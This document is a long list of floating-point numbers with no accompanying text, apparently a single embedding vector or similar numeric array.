-0.011862825602293015, 0.013325640931725502, -0.0008775218157097697, 0.015937332063913345, -0.015256022103130817, 0.0020689810626208782, 0.0005301868077367544, -0.01148209348320961, 0.017954546958208084, -0.022456543520092964, -0.00404110923409462, 0.0041613406501710415, 0.038500748574733734, -0.022710364311933517, -0.012924869544804096, -0.033851802349090576, -0.0177274439483881, 0.03524114191532135, -0.02566271275281906, 0.004642265848815441, -0.01488196849822998, 0.041840508580207825, 0.004532053600996733, -0.008489669300615788, 0.00254155695438385, 0.022977545857429504, -0.012824676930904388, -0.010480165481567383, 0.011442016810178757, 0.00029097654623910785, 0.05012311041355133, -0.022216081619262695, 0.02204241417348385, -0.01732667349278927, 0.022924110293388367, 0.014187298715114594, 0.0203324556350708, -0.017981264740228653, -0.00254155695438385, 0.007788319140672684, -0.006265388801693916, -0.024513835087418556, -0.00471574068069458, -0.017714085057377815, -0.01904998905956745, 0.026410818099975586, -0.03601596876978874, 0.02464742586016655, 0.007714844774454832, 0.005153249017894268, -0.02097368985414505, 0.0140537079423666, -0.010066035203635693, -0.008663336746394634, -0.008736810646951199, -0.01974465884268284, 0.004198077600449324, 0.0240061916410923, -0.035348016768693924, 0.009778816252946854, 0.02566271275281906, -0.016819030046463013, -0.026531049981713295, -0.005851258989423513, -0.01742018572986126, 0.017714085057377815, 0.012023134157061577, 0.01564343459904194, -0.015910614281892776, -0.033050261437892914, -0.0005811181617900729, -0.019330527633428574, -0.005751065909862518, 0.009511635638773441, 0.02786695398390293, 0.008963914588093758, -0.02587645687162876, 0.03446631878614426, -0.03481365367770195, 0.023431753739714622, -0.02130766585469246, -0.0257562268525362, -0.00010029715485870838, -0.045821502804756165, -0.014521274715662003, 0.0025782943703234196, 0.012103288434445858, -0.003793966956436634, 0.008336040191352367, -0.015897255390882492, 0.028134135529398918, 0.03192810341715813, -0.0074476636946201324, 0.01249070093035698, -0.0012966616777703166, 0.02367221564054489, 0.0032429066486656666, -0.018595781177282333, 0.01628466695547104, 0.01259757298976183, 0.015870537608861923, -0.011315105482935905, 0.015603356994688511, -0.002220940077677369, -0.004942844156175852, 0.0009334628120996058, 0.02042596973478794, 0.009217736311256886, 0.002720234217122197, -0.004555432125926018, 0.05637514218688011, -0.01233707182109356, -0.0235787034034729, 0.00032145186560228467, -0.016458334401249886, -0.008316000923514366, 0.004942844156175852, -0.004241494461894035, -0.012196801602840424, -0.011081322096288204, 0.021935541182756424, -0.004371745511889458, 0.019864890724420547, -0.037405308336019516, -0.00013192050391808152, 0.0048059141263365746, -0.026103561744093895, -0.012043173424899578, 0.010934372432529926, 0.023966114968061447, 0.0031410439405590296, 0.009932445362210274, -0.0021691739093512297, 0.035107553005218506, -0.007474381942301989, -0.005774444434791803, -0.02697189897298813, -0.00969198253005743, -0.0012549146777018905, -0.0019036629237234592, 0.014494556933641434, -0.03144717589020729, -0.008589861914515495, 0.013172011822462082, 0.023418394848704338, -0.00917098019272089, 0.013526026159524918, -0.013599500991404057, -0.009471558034420013, 0.020319096744060516, 0.02976393699645996, -0.0162312313914299, -0.06225311756134033, 0.04985593259334564, -0.006268728524446487, 0.017433544620871544, 0.0046556247398257256, 0.041439738124608994, -0.007474381942301989, -0.0066795190796256065, -0.019090065732598305, 0.006692878436297178, 0.0001725194597383961, 0.02170843817293644, -0.0376724898815155, 0.01748698204755783, 0.027305874973535538, -0.00016093466547317803, 0.025395531207323074, 0.0015254352474585176, -0.02403290942311287, 0.011401939205825329, -0.02507491409778595, -0.04082522168755531, -0.015336176380515099, -0.006148497574031353, 0.010306498035788536, -0.01748698204755783, 0.011629043146967888, -0.028855523094534874, -0.013492628931999207, -0.025529121980071068, 0.022790519520640373, 0.0038841404020786285, -0.0004909446579404175, -0.023338239639997482, -0.0179411880671978, -0.013880040496587753, 0.00508979381993413, -0.02412642352283001, 0.005156588740646839, -0.011575606651604176, -0.004441880155354738, 0.029443319886922836, -0.01834196038544178, 0.021200794726610184, 0.025128351524472237, -0.0018669256241992116, -0.007501100189983845, -0.0019404003396630287, -0.0527949184179306, -0.018021343275904655, -0.0026701376773416996, -0.0036436778027564287, -0.03628314658999443, 0.034306012094020844, -0.021427897736430168, -0.04274892434477806, 0.030565479770302773, 0.015576638281345367, -0.008122295141220093, -0.004067827016115189, -0.011889544315636158, 0.03425257280468941, -0.013586142100393772, -0.019945044070482254, 0.0027436125092208385, -0.01742018572986126, -0.003231217386201024, -0.003040851093828678, 0.049401722848415375, 0.004555432125926018, 0.010112792253494263, -0.028802087530493736, 0.028267724439501762, 0.026010047644376755, -0.01935724727809429, 0.02832116186618805, 0.008255885913968086, 0.009725379757583141, 0.0029406582470983267, -0.02770664542913437, 0.042722202837467194, -0.001770072616636753, 0.00531355757266283, -0.002753631677478552, -0.0014444460393860936, -0.02627722918987274, -0.019009912386536598, 0.014841891825199127, -0.006839827634394169, -0.03101968765258789, -0.002099038800224662, 0.03761905059218407, -0.02305770106613636, 0.028641778975725174, -0.018422113731503487, -0.002960696816444397, -0.00997920148074627, 0.0027686606626957655, 0.03606940433382988, -0.02128094807267189, 0.012717804871499538, 0.012216840870678425, 0.023538624867796898, -0.01677895151078701, 0.0051699476316571236, -0.004274892155081034, -0.028053980320692062, 0.03144717589020729, 0.01938396506011486, -0.014614787884056568, -0.0019938363693654537, 0.011094680987298489, -0.018048061057925224, -0.014347607269883156, 0.014828532934188843, 0.018181651830673218, -0.007100328803062439, -0.018301881849765778, 0.04007711634039879, -0.015696870163083076, -0.018502268940210342, -0.010139510035514832, -0.0028772028163075447, -0.042481742799282074, -0.028855523094534874, 0.0008123965235427022, 0.02675815299153328, 0.0023177932016551495, -0.007861793972551823, -0.01995840296149254, -0.0003456651174928993, -0.007754921913146973, 0.0160174872726202, 0.005373673047870398, -0.025422250851988792, -0.04507339373230934, 0.027733363211154938, 0.02216264419257641, 0.027386028319597244, -0.029470037668943405, -0.015429689548909664, -0.02850818820297718, 0.002636740216985345, 0.005153249017894268, 0.014187298715114594, 0.0001200226106448099, 0.008068859577178955, -0.010246382094919682, 0.003860762109979987, -0.013338999822735786, -0.029924245551228523, -0.0058846562169492245, 0.025609277188777924, 0.01895647495985031, -0.008476309478282928, 0.0012599242618307471, 0.013933476991951466, -0.020599637180566788, 0.011609003879129887, 0.007113687694072723, 0.0257161483168602, -0.02412642352283001, 0.004939504433423281, -0.012150045484304428, -0.018235087394714355, -0.017153006047010422, -0.005293518770486116, 0.008416194468736649, 0.012357110157608986, 0.013759809546172619, -0.009705341421067715, -0.009104184806346893, 0.003224537940695882, -0.02035917527973652, 0.0010603736154735088, -0.009972522035241127, -0.02324472740292549, 0.007995384745299816, -0.008389475755393505, -0.027519619092345238, -0.010119471698999405, -0.0007973675965331495, -0.0389549545943737, 0.060062237083911896, -0.01846219040453434, -0.03465334698557854, -0.011662440374493599, -0.009411442093551159, 0.0175136998295784, -0.01510907243937254, -0.009344647638499737, -0.012971626594662666, 0.00045921694254502654, -0.003136034356430173, -0.010987808927893639, 0.013960194773972034, 0.008149013854563236, 0.02002519927918911, -0.022737083956599236, 0.00823584757745266, -0.01739346794784069, -0.009518315084278584, -0.001492872484959662, -0.015843819826841354, 0.02237638831138611, -0.012190122157335281, -0.010072714649140835, 0.011201553978025913, -0.016765592619776726, -0.00553398160263896, 0.002062301617115736, -0.006335523910820484, -0.010934372432529926, -0.04651617258787155, -0.006489153020083904, 0.0031577427871525288, 0.007514459080994129, 0.008589861914515495, -0.00531355757266283, 0.007100328803062439, -0.015242663212120533, -0.018422113731503487, -0.011595644988119602, -0.0064423964358866215, 0.03823356702923775, 0.004501996096223593, -0.021214153617620468, 0.014026990160346031, -0.005837899632751942, 0.021133998408913612, -0.002234299201518297, 0.019704582169651985, -0.011649081483483315, -0.009150940924882889, -0.00043166393879801035, 0.006619403604418039, 0.014935404993593693, 0.007307393942028284, 0.003727171802893281, 0.019130142405629158, 0.01571022905409336, 0.009805534034967422, -0.020345814526081085, -0.012944907881319523, -0.008643297478556633, 0.022269517183303833, 0.022763801738619804, 0.0025198485236614943, 0.017687367275357246, 0.01073398720473051, -0.01782095804810524, 0.021107280626893044, 0.031099840998649597, 0.03521442413330078, 0.009037389419972897, -0.0003116413136012852, -0.007461023051291704, -0.001421902677975595, 0.007367509417235851, -0.013185370713472366, 0.014975481666624546, 0.003520106663927436, -0.031981538981199265, 0.017527058720588684, 0.028561623767018318, -0.0011989737395197153, -0.006158516742289066, -0.015015559270977974, 0.01267772726714611, 0.004181378986686468, -0.02611692063510418, 0.006596025079488754, -0.00047925551189109683, 0.009424801915884018, -0.021842027083039284, 0.029897527769207954, 0.009919085539877415, -0.0015262701781466603, 0.017994625493884087, 0.016057563945651054, -0.006155177019536495, -0.004208097234368324, -0.01223019976168871, 0.008135654032230377, 0.0130918575450778, 0.007133726496249437, -0.012951587326824665, -0.03150061145424843, 0.0012131676776334643, 0.01879616640508175, 0.027947107329964638, -0.025435609742999077, 0.006031605880707502, 0.022817237302660942, -0.012170083820819855, 0.01084085926413536, -0.029416602104902267, -0.008322681300342083, 0.019758017733693123, -0.016618642956018448, -0.009772136807441711, -0.006599364802241325, -0.0013375737471506, -0.029283011332154274, -0.0048560104332864285, 0.022456543520092964, -0.0012908170465379953, 0.028828805312514305, 0.01148209348320961, -0.007354150526225567, -0.019584350287914276, -0.006662820465862751, 0.03628314658999443, -0.014120503328740597, 0.007020174525678158, -0.004365065600723028, -0.012824676930904388, 0.019758017733693123, -0.013679655268788338, -0.0002759476483333856, 0.010974450036883354, 0.012657688930630684, 0.013826604932546616, -0.012089929543435574, 0.02152140997350216, 0.005417089909315109, 0.019758017733693123, 0.010600397363305092, 0.020826740190386772, -0.019985120743513107, 0.00006888253847137094, 0.012423905543982983, 0.00816237274557352, 0.005944772157818079, -0.02284395508468151, 0.011782672256231308, -0.005797822494059801, 0.0005314392619766295, 0.004749137908220291, 0.008730131201446056, -0.01647169515490532, 0.01824844628572464, -0.0031978196930140257, -0.0021942220628261566, 0.009271172806620598, 0.0009075796697288752, -0.018515627831220627, 0.017126286402344704, -0.007167124189436436, 0.014735018834471703, -0.021668359637260437, -0.023952756077051163, -0.06081034243106842, 0.013265524990856647, 0.02476765774190426, -0.0410924032330513, 0.012016454711556435, 0.02367221564054489, 0.013499308377504349, -0.012423905543982983, 0.04258861392736435, 0.014654865488409996, -0.01571022905409336, -0.007187162525951862, 0.01978473551571369, -0.007681447081267834, 0.002795378677546978, 0.03628314658999443, -0.019237015396356583, 0.0031594126485288143, -0.00015759489906486124, -0.042455025017261505, 0.006121779326349497, 0.013672975823283195, 0.04117255657911301, 0.0072873556055128574, -0.008823644369840622, -0.013599500991404057, -0.03641673922538757, 0.02063971385359764, -0.01233707182109356, -0.00863661803305149, -0.01518922671675682, 0.019544273614883423, 0.0009852290386334062, 0.0019754678942263126, 0.016151078045368195, -0.012430584989488125, -0.012069891206920147, 0.007187162525951862, 0.00796198658645153, -0.01414722204208374, 0.04170691594481468, -0.011983057484030724, 0.037218280136585236, -0.014320889487862587, 0.033451031893491745, 0.0014444460393860936, -0.00606166385114193, 0.014000272378325462, 0.005103152710944414, -0.00542710954323411, 0.014521274715662003, -0.012691086158156395, 0.013606180436909199, -0.005430449265986681, -0.0008675025310367346, -0.011468734592199326, 0.015055635944008827, 0.03815341368317604, -0.00018149506649933755, -0.005644193850457668, 0.019130142405629158, -0.0003621551732067019, 0.015175867825746536, -0.00038302867324091494, -0.01843547262251377, 0.005463846493512392, 0.0021207472309470177, -0.023779088631272316, -0.020706510171294212, -0.0049127861857414246, -0.01689918339252472, -0.00179512077011168, 0.014240735210478306, -0.003984333015978336, 0.04146645590662956, -0.016191154718399048, -0.00017638105782680213, 0.002319463063031435, 0.0077482424676418304, 0.0009342977427877486, 0.021214153617620468, -0.005523962434381247, 0.003075918648391962, 0.016431616619229317, -0.00067755370400846, 0.005473866127431393, 0.010774064809083939, -0.002822096925228834, 0.016338104382157326, 0.006278748158365488, -0.004385104402899742, -0.0007209706236608326, -0.0005193325923755765, -0.0009868989000096917, -0.012016454711556435, -0.025489045307040215, 0.019464118406176567, 0.008362757973372936, 0.008215808309614658, -0.006793071050196886, -0.006205273326486349, -0.010253061540424824, 0.010486844927072525, -0.01812821440398693, -0.027011975646018982, 0.013025062158703804, -0.02170843817293644, -0.010767385363578796, 0.02687838487327099, -0.02026566118001938, 0.0038006464019417763, 0.03446631878614426, 0.008649976924061775, 0.00785511452704668, 0.0022960847709327936, -0.004642265848815441, 0.006899943109601736, -0.023859241977334023, 0.005607456434518099, -0.01770072616636753, -0.007127047050744295, 0.008670016191899776, 0.019343888387084007, -0.006906623020768166, 0.0036136198323220015, 0.00849634874612093, 0.005544000770896673, 0.001397689338773489, 0.0052634612657129765, 0.009671944193542004, -0.018261805176734924, 0.030325017869472504, 0.023378316313028336, 0.025863097980618477, -0.02609020099043846, -0.005958131048828363, 0.01699269749224186, -0.0065459287725389, -0.002322802785784006, 0.0008867061696946621, -0.02467414364218712, -0.021668359637260437, -0.014280811883509159, 0.01775416173040867, -0.00938472431153059, 0.011415298096835613, 0.005403731018304825, -0.021027127280831337, 0.017674008384346962, -0.008623259142041206, 0.0022259496618062258, 0.009304570034146309, 0.0010921013308688998, -0.010907654650509357, 0.0036303186789155006, -0.018288522958755493, 0.002382918493822217, 0.005647533573210239, 0.008275924250483513, -0.009671944193542004, -0.025622636079788208, 0.0341724194586277, 0.006826468743383884, 0.01152885053306818, 0.016939260065555573, -0.014173939824104309, 0.013285563327372074, 0.0047524780966341496, -0.01226359698921442, -0.01529609877616167, -0.009471558034420013, -0.008128974586725235, 0.020372534170746803, -0.012991664931178093, 0.02367221564054489, -0.0015304448315873742, -0.0070335338823497295, -0.000256117811659351, -0.009364685975015163, -0.000059385100030340254, -0.01680567115545273, -0.02125423029065132, 0.006231991574168205, -0.02216264419257641, 0.004254853818565607, 0.006853186525404453, 0.01907670684158802, 0.031367022544145584, -0.016725515946745872, -0.006302126217633486, -0.005787803325802088, -0.0045454129576683044, -0.0008583182352595031, -0.024807734414935112, -0.03270292654633522, -0.006759673357009888, 0.010673871263861656, -0.0012273616157472134, 0.016110999509692192, 0.009932445362210274, 0.008656657300889492, 0.019036630168557167, 0.0031310245394706726, 0.013746450655162334, -0.025155069306492805, 0.0028237667866051197, 0.007841755636036396, 0.016912542283535004, -0.007641369942575693, -0.0025833039544522762, 0.020960330963134766, -0.01613771915435791, -0.03168763965368271, -0.015309457667171955, -0.007982025854289532, 0.006823129020631313, 0.024179859086871147, -0.00418805843219161, 0.008149013854563236, -0.02305770106613636, 0.021267589181661606, -0.014975481666624546, -0.000656680203974247, 0.014374325051903725, -0.0028154172468930483, 0.003506747540086508, -0.028775367885828018, -0.00018921824812423438, -0.016578566282987595, 0.012657688930630684, -0.0367373563349247, -0.015055635944008827, 0.026344023644924164, -0.004572130739688873, 0.015068994835019112, 0.003456651233136654, -0.0160174872726202, 0.011228271760046482, -0.0008867061696946621, 0.02599668875336647, 0.01929045096039772, -0.009204377420246601, 0.016979338601231575, -0.01132846437394619, -0.03655032813549042, -0.009371365420520306, -0.021441256627440453, -0.016738874837756157, -0.005951451603323221, 0.0015713569009676576, 0.03711140900850296, 0.008149013854563236, 0.011381900869309902, -0.004949523601680994, -0.013693014159798622, 0.011014526709914207, 0.0037371909711509943, 0.010927692987024784, 0.0015671821311116219, 0.0022242798004299402, -0.015656793490052223, -0.006893263664096594, 0.047504741698503494, -0.002548236632719636, -0.012363789603114128, -0.006579326465725899, -0.02360542118549347, 0.001245730323716998, -0.01720644161105156, -0.017714085057377815, 0.005246762186288834, 0.0012624291703104973, -0.01711292751133442, -0.005754405632615089, -0.0072673168033361435, -0.0043984632939100266, 0.0007677272078581154, -0.027626492083072662, 0.021481333300471306, -0.010967770591378212, -0.025863097980618477, 0.024781016632914543, 0.00025945756351575255, -0.0013935146853327751, 0.0026384100783616304, 0.006135138217359781, -0.0024280052166432142, 0.016004128381609917, 0.020439328625798225, -0.0010486844694241881, 0.000964355596806854, 0.008362757973372936, -0.0009526664507575333, 0.014628146775066853, -0.004775856155902147, 0.010981129482388496, -0.006479133386164904, -0.01699269749224186, -0.004251514095813036, 0.005246762186288834, -0.03775264322757721, 0.011575606651604176, 0.0017851014854386449, -0.01532281655818224, -0.002458062954246998, -0.003449971554800868, -0.015483125112950802, -0.006382280495017767, -0.0048059141263365746, 0.001947079785168171, -0.0048560104332864285, 0.018382037058472633, -0.011956339702010155, -0.00007655355148017406, -0.009732059203088284, -0.00969198253005743, 0.009945804253220558, 0.003049200400710106, 0.01425409410148859, -0.013485949486494064, 0.013606180436909199, 0.011001167818903923, -0.007641369942575693, 0.0012916519772261381, 0.02222944051027298, -0.006235331296920776, 0.020412610843777657, -0.006960059050470591, 0.01898319274187088, 0.0006879904540255666, 0.0066995578818023205, -0.021574847400188446, 0.002576624508947134, 0.01488196849822998, 0.005330256186425686, -0.004174699541181326, -0.01058035809546709, 0.011809390038251877, 0.02415314130485058, -0.00658266618847847, 0.00770148541778326, 0.018809525296092033, -0.023124495521187782, 0.003020812524482608, -0.006342203356325626, -0.0008833663887344301, -0.003079258371144533, 0.0007155435159802437, 0.0029807353857904673, -0.014240735210478306, -0.010967770591378212, -0.008730131201446056, 0.017567135393619537, -0.009732059203088284, -0.014908687211573124, 0.00013327728083822876, -0.008696733973920345, -0.0019871569238603115, 0.011001167818903923, 0.005286839324980974, -0.008676695637404919, 0.006342203356325626, -0.0062921070493757725, -0.003790627233684063, 0.017981264740228653, 0.014654865488409996, 0.00030454431544058025, 0.03139374032616615, 0.0118962237611413, -0.003206169232726097, 0.010526922531425953, -0.016792310401797295, -0.008930517360568047, 0.017767520621418953, 0.015656793490052223, -0.006125119049102068, -0.0015012219082564116, -0.0023077738005667925, 0.0034015451092272997, 0.008923837915062904, -0.013145294040441513, -0.00953835342079401, 0.015603356994688511, -0.043710771948099136, 0.0020673112012445927, -0.005383692681789398, -0.010847538709640503, 0.015883896499872208, 0.005867957603186369, -0.01910342462360859, 0.024206576868891716, 0.006479133386164904, 0.005323576740920544, 0.028802087530493736, -0.0257562268525362, -0.006171875633299351, 0.01775416173040867, 0.015349535271525383, 0.015843819826841354, 0.008736810646951199, 0.0140537079423666, 0.014855250716209412, 0.0006099236197769642, 0.009618507698178291, -0.010092753916978836, -0.00598484929651022, 0.00482261274009943, -0.014922046102583408, -0.02765320986509323, -0.0012482351157814264, -0.0045454129576683044, -0.012196801602840424, -0.0015396291855722666, -0.022643569856882095, 0.017380109056830406, -0.011054604314267635, 0.021882105618715286, -0.0064223576337099075, 0.0021457956172525883, -0.017072850838303566, -0.007354150526225567, 0.005387032404541969, 0.04125270992517471, -0.0237924475222826, -0.020559560507535934, -0.015576638281345367, -0.014454479329288006, 0.016979338601231575, -0.004234815016388893, -0.00949159637093544, 0.01744690351188183, -0.013572783209383488, 0.013332320377230644, 0.015362894162535667, -0.006378940772265196, -0.022176003083586693, 0.006873225327581167, 0.028241006657481194, -0.007668088190257549, -0.020372534170746803, -0.011321784928441048, -0.004668984096497297, -0.017259877175092697, -0.009030709974467754, 0.013412474654614925, 0.018916398286819458, -0.0036737355403602123, 0.013719731941819191, 0.013519346714019775, -0.024567270651459694, -0.015349535271525383, 0.013265524990856647, 0.025956612080335617, 0.002822096925228834, 0.016511771827936172, -0.021761873736977577, -0.003449971554800868, 0.02492796629667282, -0.015670152381062508, -0.0027569716330617666, 0.0002565352770034224, 0.007988705299794674, 0.004258193541318178, -0.026290588080883026, -0.0012858074624091387, -0.018595781177282333, 0.025061555206775665, 0.0023177932016551495, 0.0016131039010360837, -0.005817861296236515, -0.00987232942134142, 0.01632474549114704, 0.00334476912394166, -0.013559424318373203, 0.014547992497682571, 0.004405142739415169, -0.033878520131111145, 0.010420049540698528, -0.006465774495154619, 0.011602324433624744, 0.005206685047596693, 0.005126530770212412, -0.0018251786241307855, 0.019584350287914276, -0.00609172135591507, 0.005250101909041405, -0.015790382400155067, 0.02808069810271263, -0.001573861693032086, -0.008663336746394634, -0.010774064809083939, -0.01717972382903099, 0.006853186525404453, -0.004999619908630848, 0.009484916925430298, 0.006121779326349497, 0.0181549321860075, -0.02670471742749214, 0.014988841488957405, -0.010600397363305092, 0.0018452171934768558, -0.023592062294483185, 0.017994625493884087, -0.0014519605319947004, -0.0030141330789774656, -0.003790627233684063, -0.0255024041980505, -0.005066415295004845, 0.0031844608020037413, -0.00782171729952097, -0.00826924480497837, 0.002179193077608943, -0.0036737355403602123, -0.006719596218317747, -0.02997768297791481, -0.008997312746942043, -0.03243574500083923, 0.010092753916978836, -0.015777023509144783, -0.0007426790543831885, -0.022082490846514702, 0.0030191426631063223, -0.014173939824104309, -0.0022359690628945827, 0.013459230773150921, 0.011148117482662201, -0.03353118523955345, 0.0018769449088722467, 0.018822884187102318, 0.010379972867667675, 0.008462950587272644, 0.012256917543709278, 0.00792858935892582, -0.00527348043397069, 0.016498412936925888, 0.0015529881929978728, -0.01500220037996769, -0.02661120519042015, 0.0015579978935420513, -0.007093649357557297, -0.005076434463262558, 0.019156860187649727, -0.022269517183303833, 0.005584077909588814, 0.0177274439483881, -0.0019136822083964944, 0.0033564583864063025, 0.006960059050470591, 0.01895647495985031, 0.007908551022410393, 0.01301170326769352, 0.006071683019399643, 0.028347879648208618, 0.011702517978847027, -0.0048593501560389996, 0.004361725877970457, -0.010420049540698528, -0.024393603205680847, -0.02339167706668377, -0.01414722204208374, 0.011168155819177628, 0.03248918056488037, -0.005988189019262791, 0.02409970574080944, 0.004007711540907621, -0.000019764593162108213, -0.0016072592698037624, -0.02367221564054489, 0.0037505500949919224, -0.0044485596008598804, -0.02054620161652565, 0.04007711634039879, 0.007053572218865156, -0.00616853591054678, -0.009050748310983181, 0.016364822164177895, -0.015563279390335083, -0.0008758519543334842, 0.019130142405629158, -0.012664368376135826, -0.0005548175540752709, -0.01047348603606224, 0.01106796320527792, 0.0029423281084746122, 0.011796031147241592, 0.004685682710260153, 0.01720644161105156, 0.007347471080720425, -0.005133210681378841, 0.0028070679400116205, 0.006452415604144335, -0.011462055146694183, -0.015843819826841354, 0.005774444434791803, -0.005076434463262558, -0.003994352649897337, 0.009237774647772312, -0.0015429689083248377, -0.02085345797240734, 0.013659616932272911, -0.02088017761707306, -0.0002471422194503248, 0.003277973970398307, 0.016030846163630486, 0.005203345324844122, 0.008476309478282928, -0.0060149068012833595, 0.017139645293354988, -0.001633142470382154, 0.0014210677472874522, 0.013151973485946655, 0.002523188479244709, -0.0076213316060602665, -0.002389597939327359, -0.0007881832425482571, 0.015723587945103645, 0.0034265932627022266, 0.004465258680284023, 0.009130902588367462, 0.006068343296647072, -0.01466822437942028, -0.003034171648323536, 0.011088001541793346, 0.0029156100936233997, 0.019023271277546883, -0.012711125425994396, -0.01301170326769352, -0.003647017525509, 0.018048061057925224, 0.0065492684952914715, -0.02216264419257641, 0.025422250851988792, -0.004204757511615753, 0.006515870802104473, -0.008195769973099232, 0.01931716874241829, 0.012771240435540676, 0.015175867825746536, -0.0005251772236078978, 0.003844063263386488, 0.006532569881528616, 0.00997920148074627, -0.0004212271887809038, -0.018074778839945793, -0.013526026159524918, -0.025649353861808777, 0.005620815325528383, -0.006739635020494461, -0.004799234680831432, 0.029523475095629692, -0.0035334655549377203, -0.01122159231454134, -0.00020633451640605927, 0.022082490846514702, -0.012584214098751545, -0.001031150808557868, -0.007240598555654287, 0.0005506428424268961, 0.0061418176628649235, -0.007794999051839113, -0.0012858074624091387, -0.007628011051565409, 0.0008992302464321256, 0.009464878588914871, -0.004996280185878277, -0.006128458771854639, 0.006121779326349497, 0.012951587326824665, -0.008616579696536064, -0.014214016497135162, 0.01983817107975483, -0.005674251355230808, -0.007374189328402281, 0.00816237274557352, 0.023445112630724907, 0.00016552682791370898, 0.00003467609712970443, 0.004795894958078861, -0.00755453621968627, 0.009678623639047146, -0.0030825980938971043, 0.004588829819113016, -0.0004354211559984833, 0.00984561163932085, -0.002010535215958953, 0.024580631405115128, -0.01931716874241829, -0.020920254290103912, -0.005463846493512392, -0.025702789425849915, -0.010406690649688244, 0.007694805972278118, -0.010039317421615124, 0.02412642352283001, -0.018782807514071465, -0.021147357299923897, 0.01532281655818224, -0.017460262402892113, 0.003730511525645852, -0.01983817107975483, 0.004027749877423048, -0.012063211761415005, 0.02393939718604088, 0.018662577494978905, 0.006649461109191179, -0.015242663212120533, -0.0015229303389787674, 0.002964036539196968, -0.006318825297057629, -0.023685574531555176, -0.013746450655162334, 0.0019671183545142412, 0.010754025541245937, -0.018996551632881165, 0.0007238928810693324, 0.012811318039894104, 0.009578430093824863, 0.027386028319597244, 0.017219800502061844, 0.008249206468462944, -0.010987808927893639, 0.009578430093824863, 0.010126151144504547, -0.002868853509426117, 0.0076012928038835526, 0.014120503328740597, 0.002154144924134016, -0.004876048769801855, 0.006305465940386057, 0.003262945218011737, 0.01953091472387314, -0.0013417484005913138, 0.008569822646677494, 0.018141573294997215, 0.014200657606124878, 0.028134135529398918, -0.019637785851955414, 0.0005656717694364488, -0.007681447081267834, -0.014374325051903725, -0.011462055146694183, -0.004742458462715149, -0.008389475755393505, 0.005346955265849829, -0.014160580933094025, 0.04526042193174362, 0.012350430712103844, -0.010353255085647106, -0.02808069810271263, -0.02792038954794407, 0.009324608370661736, 0.009117543697357178, -0.0021992316469550133, 0.01696597784757614, 0.02244318462908268, -0.007360829971730709, -0.0039008392486721277, -0.015496484935283661, -0.003147723386064172, 0.006455755326896906, -0.0068598659709095955, -0.017767520621418953, 0.012590893544256687, 0.007414266467094421, -0.00668953824788332, -0.02893567644059658, 0.0010010929545387626, -0.000749776023440063, -0.02896239422261715, -0.04421841725707054, -0.01919693872332573, -0.0009727049618959427, -0.01050020381808281, 0.01357946265488863, 0.0009409772465005517, 0.01163572259247303, 0.010533601976931095, 0.010533601976931095, 0.0037505500949919224, -0.0016239581163972616, 0.015589998103678226, -0.008877080865204334, 0.00545716704800725, 0.008048820309340954, -0.009999239817261696, 0.004996280185878277, 0.012330392375588417, 0.019851531833410263, -0.014815173111855984, 0.01888968050479889, -0.00792858935892582, -0.004628906957805157, -0.01763392984867096, 0.016110999509692192, 0.0073207528330385685, 0.027947107329964638, -0.016511771827936172, -0.005921393632888794, 0.02559591829776764, -0.011421977542340755, 0.0001731456577545032, 0.012630971148610115, -0.012544137425720692, 0.012163404375314713, 0.0029690463561564684, -0.0056274947710335255, 0.010794103145599365, -0.006432376801967621, -0.01132846437394619, 0.02168171852827072, -0.0030809282325208187, 0.012944907881319523, 0.006669499911367893, -0.035535041242837906, -0.013385756872594357, -0.0101662278175354, -0.0027469522319734097, -0.0010695579694584012, -0.01668543927371502, -0.0006124284118413925, 0.009598469361662865, -0.001362621900625527, -0.036603763699531555, 0.023378316313028336, -0.004735779017210007, -0.016939260065555573, -0.011455375701189041, 0.003647017525509, -0.00396429467946291, -0.015376253053545952, -0.015870537608861923, 0.008736810646951199, -0.027212360873818398, -0.011695838533341885, -0.001928711193613708, 0.004575470462441444, 0.005590757355093956, -0.019063347950577736, 0.022363029420375824, 0.01163572259247303, -0.004946183878928423, -0.0043416875414550304, 0.0259699709713459, 0.01739346794784069, 0.02890895865857601, 0.0020222244784235954, -0.0010269760387018323, -0.0005990694044157863, -0.008215808309614658, 0.016431616619229317, 0.0014419412473216653, 0.0030291618313640356, -0.00017658979049883783, -0.012216840870678425, 0.004361725877970457, -0.014133862219750881, 0.005477205850183964, 0.0006925826310180128, -0.001753373770043254, -0.015376253053545952, 0.024901246652007103, 0.009378044866025448, -0.012944907881319523, 0.01803470216691494, 0.003523446386680007, 0.02023894339799881, 0.012737843208014965, 0.009638546034693718, 0.007100328803062439, -0.00852974597364664, 0.005270140711218119, -0.01278459932655096, -0.004181378986686468, -0.013125254772603512, -0.001446950831450522, -0.0015788713935762644, -0.01529609877616167, -0.0013041761703789234, -0.0076012928038835526, -0.01564343459904194, 0.004882728680968285, -0.006899943109601736, 0.02462070807814598, -0.038046542555093765, 0.006609384436160326, -0.004632246680557728, -0.01085421908646822, 0.026531049981713295, 0.020252302289009094, -0.002264356939122081, -0.0032479162327945232, 0.00034462145413272083, -0.005614135880023241, -0.013178691267967224, -0.0061651961877942085, 0.012043173424899578, -0.007521138526499271, -0.012350430712103844, -0.02213592641055584, -0.03211512789130211, -0.008977273479104042, 0.008776888251304626, 0.011475414037704468, -0.014547992497682571, 0.013338999822735786, 0.0032378968317061663, -0.017660649493336678, -0.0037605692632496357, -0.02808069810271263, 0.02194890007376671, -0.0053168972954154015, 0.0002698943135328591, -0.004204757511615753, 0.019009912386536598, 0.004535393323749304, -0.00004367779183667153, 0.014427761547267437, 0.01592397317290306, -0.0018702653469517827, 0.016204513609409332, -0.007093649357557297, -0.007948627695441246, -0.014614787884056568, -0.0004210184561088681, 0.01223019976168871, -0.0027937088161706924, -0.02088017761707306, -0.010693910531699657, 0.008890439756214619, -0.0036136198323220015, 0.019009912386536598, 0.00024192382988985628, -0.01711292751133442, 0.007260637357831001, 0.019985120743513107, 0.02663792297244072, 0.00837611686438322, -0.015389611944556236, 0.0022192702163010836, -0.02299090474843979, -0.00808221846818924, -0.0033481090795248747, -0.01529609877616167, -0.012497380375862122, -0.021334383636713028, 0.0017717424780130386, -0.008516387082636356, -0.02936316654086113, -0.006722935941070318, 0.003107646247372031, -0.0022660268004983664, -0.029176140204072, -0.01025974191725254, 0.00707361102104187, 0.012437264434993267, 0.011295067146420479, 0.0037505500949919224, -0.00658266618847847, 0.009358006529510021, 0.02372565120458603, -0.021975617855787277, 0.013659616932272911, -0.009458199143409729, -0.005821201018989086, 0.04146645590662956, -0.0006733790505677462, -0.008883760310709476, -0.010092753916978836, -0.023992832750082016, 0.002855494385585189, -0.022697005420923233, -0.016525130718946457, 